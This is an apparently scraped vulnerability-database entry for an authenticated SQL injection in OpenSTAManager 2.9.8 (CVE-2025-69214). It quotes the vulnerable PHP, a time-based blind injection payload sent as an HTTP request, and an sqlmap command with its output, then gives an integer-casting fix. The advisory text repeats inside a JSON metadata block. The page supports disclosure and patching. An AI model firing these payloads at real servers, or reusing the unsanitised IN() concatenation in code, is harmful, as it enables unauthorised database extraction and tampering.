📄 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218746

8.8 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in ajaxselect.php...

Visit Original Source

Basic Information

ID PACKETSTORM:218746

Published Apr 13, 2026 at 00:00

Affected Product

Affected Versions # CVE-2025-69214: OpenSTAManager has a SQL Injection in ajax_select.php (componenti endpoint)

## Overview

| Field | Details |
|---|---|
| **CVE ID** | [CVE-2025-69214](https://nvd.nist.gov/vuln/detail/CVE-2025-69214) |
| **Severity** | HIGH |
| **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m) |
| **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |

## Affected Products

- **devcode-it/openstamanager** (versions: <= 2.9.8)

## CWE Classification

- CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

## Details

## Summary
A SQL Injection vulnerability exists in the `ajax_select.php` endpoint when handling the `componenti` operation. An authenticated attacker can inject malicious SQL code through the `options[matricola]` parameter.

## Proof of Concept

### Vulnerable Code
**File:** `modules/impianti/ajax/select.php:122-124`

```php
case 'componenti':
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
$where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}
```

### Data Flow
1. **Source:** `$_GET['options']['matricola']` → `$superselect['matricola']`
2. **Vulnerable:** User input concatenated directly into `IN()` clause without sanitization
3. **Sink:** Query executed via AJAX framework

### Exploit

**Manual PoC (Time-based Blind SQLi):**
```http
GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
```
<img width="1306" height="581" alt="image" src="https://github.com/user-attachments/assets/238015dd-5644-4eed-ae8f-864dc0073011" />

**SQLMap Exploitation:**
```bash
sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
--cookie="PHPSESSID=<session>" \
--dbms=MySQL \
--technique=T \
--level=3 \
--risk=3
```

**SQLMap Output:**
```
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12
```
<img width="1228" height="801" alt="image" src="https://github.com/user-attachments/assets/b0b7078b-09a7-4e53-956c-baf1d09ed59b" />

## Impact
- **Data Exfiltration:** Time-based blind SQL injection allows complete database extraction
- **Authentication Bypass:** Access to sensitive component and equipment data
- **Data Manipulation:** Potential unauthorized modification of records

## Remediation

Cast values to integers before using in SQL:

**Before:**
```php
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
$where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}
```

**After:**
```php
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
$ids = array_map('intval', explode(',', $impianti));
$where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}
```

## Credit
Discovered by: Łukasz Rybak

## References

- https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m
- https://nvd.nist.gov/vuln/detail/CVE-2025-69214
- https://github.com/advisories/GHSA-qjv8-63xq-gq8m

## Disclaimer

This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.

{
    "lastseen": "2026-04-13T15:50:48",
    "description": "OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in ajaxselect.php...",
    "published": "2026-04-13T00:00:00",
    "modified": "2026-04-13T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:218746",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-69214"
    ],
    "sourceData": "# CVE-2025-69214: OpenSTAManager has a SQL Injection in ajax_select.php (componenti endpoint)\n    \n    ## Overview\n    \n    | Field | Details |\n    |---|---|\n    | **CVE ID** | [CVE-2025-69214](https://nvd.nist.gov/vuln/detail/CVE-2025-69214) |\n    | **Severity** | HIGH |\n    | **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m) |\n    | **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |\n    \n    ## Affected Products\n    \n    - **devcode-it/openstamanager** (versions: <= 2.9.8)\n    \n    \n    ## CWE Classification\n    \n    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\n    \n    ## Details\n    \n    ## Summary\n    A SQL Injection vulnerability exists in the `ajax_select.php` endpoint when handling the `componenti` operation. An authenticated attacker can inject malicious SQL code through the `options[matricola]` parameter.\n    \n    ## Proof of Concept\n    \n    ### Vulnerable Code\n    **File:** `modules/impianti/ajax/select.php:122-124`\n    \n    ```php\n    case 'componenti':\n        $impianti = $superselect['matricola'];\n        if (!empty($impianti)) {\n            $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';\n        }\n    ```\n    \n    ### Data Flow\n    1. **Source:** `$_GET['options']['matricola']` \u2192 `$superselect['matricola']`\n    2. **Vulnerable:** User input concatenated directly into `IN()` clause without sanitization\n    3. **Sink:** Query executed via AJAX framework\n    \n    ### Exploit\n    \n    **Manual PoC (Time-based Blind SQLi):**\n    ```http\n    GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1\n    Host: localhost:8081\n    Cookie: PHPSESSID=<valid-session>\n    ```\n    <img width=\"1306\" height=\"581\" alt=\"image\" src=\"https://github.com/user-attachments/assets/238015dd-5644-4eed-ae8f-864dc0073011\" />\n    \n    **SQLMap Exploitation:**\n    ```bash\n    sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \\\n      --cookie=\"PHPSESSID=<session>\" \\\n      --dbms=MySQL \\\n      --technique=T \\\n      --level=3 \\\n      --risk=3\n    ```\n    \n    **SQLMap Output:**\n    ```\n    [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\n    Parameter: #1* (URI)\n        Type: time-based blind\n        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n        Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI\n    back-end DBMS: MySQL >= 5.0.12\n    ```\n    <img width=\"1228\" height=\"801\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b0b7078b-09a7-4e53-956c-baf1d09ed59b\" />\n    \n    ## Impact\n    - **Data Exfiltration:** Time-based blind SQL injection allows complete database extraction\n    - **Authentication Bypass:** Access to sensitive component and equipment data\n    - **Data Manipulation:** Potential unauthorized modification of records\n    \n    ## Remediation\n    \n    Cast values to integers before using in SQL:\n    \n    **Before:**\n    ```php\n    $impianti = $superselect['matricola'];\n    if (!empty($impianti)) {\n        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';\n    }\n    ```\n    \n    **After:**\n    ```php\n    $impianti = $superselect['matricola'];\n    if (!empty($impianti)) {\n        $ids = array_map('intval', explode(',', $impianti));\n        $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';\n    }\n    ```\n    \n    ## Credit\n    Discovered by: \u0141ukasz Rybak\n    \n    ## References\n    \n    - https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-69214\n    - https://github.com/advisories/GHSA-qjv8-63xq-gq8m\n    \n    \n    ## Disclaimer\n    \n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.",
    "sourceHref": "https://packetstorm.news/download/218746",
    "cvss": {
        "score": 8.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/218746/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply